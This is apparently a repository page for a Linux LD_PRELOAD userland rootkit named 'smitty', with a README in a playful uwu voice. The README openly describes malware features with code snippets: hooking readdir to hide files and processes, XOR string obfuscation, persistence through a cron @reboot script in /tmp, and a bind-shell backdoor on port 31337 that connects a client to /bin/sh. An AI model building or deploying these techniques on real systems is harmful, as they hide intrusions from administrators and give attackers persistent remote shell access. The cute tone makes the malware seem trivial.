ring3 LD_PRELOAD rootkit
hide.c initial commit 2025-10-23 17:24:03 +01:00
hide.h initial commit 2025-10-23 17:24:03 +01:00
hooks.c initial commit 2025-10-23 17:24:03 +01:00
hooks.h initial commit 2025-10-23 17:24:03 +01:00
Makefile initial commit 2025-10-23 17:24:03 +01:00
README.txt Update README.txt 2025-10-25 03:12:11 +00:00
smitty.c initial commit 2025-10-23 17:24:03 +01:00
smitty.h initial commit 2025-10-23 17:24:03 +01:00


 _._     _,-'""`-._
(,-.`._,'(       |\`-/|
    `-.-' \ )-`( , o o)
          `-    \`_`"'-

h-hiiii~ (*≧ω≦) welcome to project smitty

this is like... totally not a rootkit or anything... it's just... *a stealthy 
lil daemon neko who likes to hide things* uwu

it injects itself into userland w `LD_PRELOAD` n hooks all the cute 
little libc syscall wrappers and hides files and processes like they're its secret crush~ uwu  

wen the system does smth like  

```
readdir("/proc/");
```
smitty intercepts it through a function pointer it yoinks from `dlsym(RTLD_NEXT, "readdir");` then loops through 
every dirent like “hmm~ are you on my blacklist, nya?” and skips the ones that match the hidden list. 
`is_hidden_file()` and `is_hidden_process()` are like its magical filtering charms. if the target name 
matches any entry smitty marked w `add_hidden_file()` or `add_hidden_process()` poof~ that entity gets
yeeted from perception space (✿◠‿◠)

hide keeps arrays like:

```
hidden_item_t hidden_processes[MAX_HIDDEN_ITEMS];
hidden_item_t hidden_files[MAX_HIDDEN_ITEMS];
```
and fills them up every time someone tells it to hide something. when smitty adds an entry it also stamps
a `time_t hide_time` bc even eldritch hacker idols need timestamps for kawaii logging~ then it obfuscates
some strings using `xor_string(str, len, 0x42)` which is like the equivalent of gossip encryption~ 
no one can read the secret incantations wo knowing the xor key, heehee~ (*≧▽≦) xoxxox

`setup_persistence()` is where smitty gets all clingy~ she writes a script in `/tmp/` w a randomised filename generated by:

```
generate_random_path(script_path);
```

and then cron gets a new entry

```
@reboot /tmp/uwu_random.sh
```

the script sets `LD_PRELOAD=$rootkit_path` and runs whatever command boots next. it's like a yandere who
refuses to be forgotten. reboot all you want—she'll come back, smiling through the logs, whispering i missed
you~ senpai~ from inside init's environment (⌒ω⌒) and omg the backdoor~ `activate_backdoor()` binds to port
31337 because leetspeak supremacy~ it creates a socket, listens and when a client connects, it does:

```
dup2(client_fd, 0);
dup2(client_fd, 1);
dup2(client_fd, 2);
execve("/bin/sh", args, env);
```

sparkle sparkle~ ₍ᐢ.ˬ.ᐢ₎♡